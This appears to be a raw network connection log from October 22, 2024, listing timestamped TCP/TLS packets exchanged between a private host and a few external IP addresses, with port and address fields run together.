                                                                                                Oct 22, 2024 06:17:12.809988022 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:12.814032078 CEST6016249733191.252.83.213192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.418948889 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.420175076 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:13.420217991 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.710195065 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.710294962 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.710449934 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:13.710480928 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.711883068 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.711935043 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:13.711965084 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.741580009 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.741633892 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:13.741647005 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.744474888 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.744499922 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.744551897 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:13.744561911 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.744606018 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:13.835350990 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.837088108 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.837115049 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.837143898 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:13.837176085 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.837229967 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:13.858098984 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.859786034 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.859818935 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.859843016 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:13.859874964 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.859920979 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:13.861715078 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.908164978 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:13.908194065 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.944097996 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.944133997 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.944164991 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:13.944195986 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.944252968 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:13.945841074 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.975856066 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.975931883 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:13.976013899 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.977255106 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.977310896 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:13.977329016 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.017577887 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.017740011 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.017800093 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.061217070 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.061378956 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.061439991 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.062175989 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.062330961 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.062392950 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.092823982 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.092859030 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.092931986 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.092994928 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.093060970 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.094491959 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.134094954 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.134165049 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.134215117 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.180176020 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.180191040 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.180351973 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.180414915 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.209850073 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.210025072 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.210088015 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.210302114 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.251208067 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.251228094 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.251386881 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.253319025 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.253334045 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.253391027 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.295600891 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.295618057 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.295674086 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.326862097 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.327040911 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.327101946 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.327169895 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.328633070 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.328644037 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.328687906 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.369673967 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.369693041 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.369844913 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.369844913 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.412643909 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.412661076 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.412818909 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.443793058 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.443809032 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.443991899 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.445717096 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.445728064 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.445781946 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.485687017 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.485873938 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.529746056 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.529926062 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.561048985 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.561218023 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.562655926 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.562720060 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.565274954 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.565335989 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.647416115 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.647593975 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.648786068 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.648854971 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.681144953 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.681333065 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.682233095 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.682291031 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.719579935 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.719654083 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.768261909 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.768455982 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.769996881 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.770070076 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.773828030 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.773900986 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.796271086 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.796355963 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.836730003 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.836910963 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.885509968 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.885694981 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.889369965 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.889444113 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.911359072 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.911446095 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.913259983 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.913320065 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:15.000469923 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:15.001940966 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:15.006011963 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:15.006045103 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:15.006119013 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:15.006159067 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:15.008243084 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:15.008421898 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:15.008483887 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:15.008544922 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:15.028951883 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:15.029135942 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:15.070873976 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:15.070926905 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:15.071036100 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:15.071048021 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:15.071115971 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:15.071506977 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:15.089139938 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:15.089184999 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:15.089253902 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:15.089528084 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:15.089549065 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:15.718583107 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:15.718799114 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:15.721952915 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:15.721970081 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:15.722383022 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:15.723311901 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:15.763356924 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.125319004 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.125363111 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.125551939 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.125613928 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.127937078 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.128017902 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.128036976 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.130079031 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.132213116 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.132239103 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.132280111 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.132307053 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.132333994 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.173890114 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.173949957 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.220768929 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.247133970 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.254137039 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.254673958 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.254734993 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.266659975 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.266874075 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.266904116 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.279234886 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.279261112 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.279393911 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.279457092 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.279527903 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.284260035 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.330163956 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.330223083 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.366112947 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.366298914 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.366360903 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.374877930 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.374918938 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.375097036 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.375161886 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.375221014 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.381087065 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.387204885 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.387233019 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.387480021 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.387545109 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.387624979 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.390391111 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.439536095 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.439594984 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.485114098 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.485310078 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.485371113 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.487087965 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.487262011 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.487323046 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.495373964 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.495405912 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.495452881 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.495475054 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.495548010 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.495589018 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.502826929 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.502859116 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.503015041 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.503079891 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.503146887 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.604151011 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.604168892 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.604471922 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.611135006 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.611148119 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.611217976 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.614391088 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.614401102 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.614470959 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.620382071 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.620392084 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.620465994 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.723887920 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.723906040 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.724096060 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.728355885 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.728452921 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.731445074 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.731640100 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.737607956 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.737797022 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.843836069 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.844222069 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.845674992 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.845761061 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.851108074 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.851187944 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.856339931 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.856519938 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.860121965 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.860210896 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.963361979 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.963599920 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.967854977 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.968084097 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.970804930 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.970889091 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.973910093 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.974082947 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:16.979300022 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:16.979480982 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.098536015 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.098782063 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.103722095 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.103926897 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.106749058 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.107141018 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.112507105 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.112596035 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.114669085 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.114865065 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.218190908 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.218410969 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.223120928 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.223304033 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.225929976 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.226144075 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.231554985 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.231731892 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.235958099 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.236140966 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.337493896 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.337677002 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.341237068 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.341413975 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.341473103 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.346309900 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.346484900 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.346545935 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.346611977 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.348865986 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.348926067 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.352927923 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.353106976 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.354964018 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.355145931 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.458596945 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.458786964 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.461961985 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.462023973 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.466511965 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.466573000 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.469769955 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.469834089 CEST49735443192.168.2.4188.114.96.3
